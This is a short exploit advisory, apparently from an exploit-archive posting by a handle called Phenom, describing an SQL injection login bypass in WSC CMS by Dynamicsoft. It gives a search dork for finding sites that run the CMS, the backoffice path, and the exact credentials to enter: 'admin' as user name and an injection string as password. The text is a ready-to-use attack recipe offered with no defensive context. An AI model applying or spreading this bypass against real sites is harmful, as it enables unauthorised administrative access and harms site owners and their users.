------------------------------------------------------
------------------------------------------------------
______
|__ \| |
| |__) | |__ ___ _ __ ____ __ ___
|___/| '_ \ / _ \ '_ \ / _/\| '_ ` _ \
| || | | |__/ | | | (_) | | | | | |
|_||_| |_|\___|_| |_|\/__/|_| |_| |_|
------------------------------------------------------
------------------------------------------------------
############### WSC CMS (Bypass) SQL Injection Vulnerability ###################################
#
# Author : Phenom
#
# mail : sys.phenom.sys[at]gmail[dot]com
#
# Dork : Realizzato con WSC CMSby Dynamicsoft
#
################################################################################################
####### Exploit ################################################################################
#
# 1- http://server/public/backoffice
#
# 2- login with "admin" as user name and 'or' as password
#
################################################################################################